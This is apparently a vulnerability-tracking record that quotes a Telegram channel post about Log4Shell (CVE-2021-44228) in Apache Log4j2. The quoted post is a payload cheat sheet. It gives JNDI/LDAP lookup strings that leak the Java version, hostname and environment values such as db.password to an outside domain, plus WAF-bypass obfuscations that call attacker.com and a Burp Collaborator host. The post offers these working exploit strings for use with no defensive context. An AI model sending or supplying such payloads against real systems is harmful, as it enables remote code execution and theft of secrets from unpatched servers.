{"uuid": "65d74a72-3386-473c-b848-21fecbea8a92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/kasraone_com/653", "content": "\ud83d\udd34 Log4Shell\n\n\nCVE-2021-44228 Log4Shell\n\n\n\n\ud83d\udd34 Apache Log4j2 &lt;=2.14.1 \n\n\nPayloads\n\nJava\n# Identify Java version and hostname\n${jndi:ldap://${java:version}.domain/a}\n${jndi:ldap://${env:JAVA_VERSION}.domain/a}\n${jndi:ldap://${sys:java.version}.domain/a}\n${jndi:ldap://${sys:java.vendor}.domain/a}\n${jndi:ldap://${hostName}.domain/a}\n${jndi:dns://${hostName}.domain}\n\n# More enumerations keywords and variables\njava:os\ndocker:containerId\nweb:rootDir\nbundle:config:db.password\n\n\n\n\ud83d\udd34WAF Bypass\n\n\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}\n\n# using lower and upper\n${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}\n${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}\n${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}\n\n# using env to create the letter\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}\n${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}\n\n\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2661 \u2800\u2800 \u3007\u2800\u00a0 \u2800 \u2399\u2800\u200c \u200c \u2332\u2063 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u02e1\u2071\u1d4f\u1d49\u00a0 \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57\u00a0 \u02e2\u1d43\u1d5b\u1d49\u00a0 \u02e2\u02b0\u1d43\u02b3\u1d49\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 K1\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 kasraone", "creation_timestamp": "2024-02-15T06:26:19.000000Z"}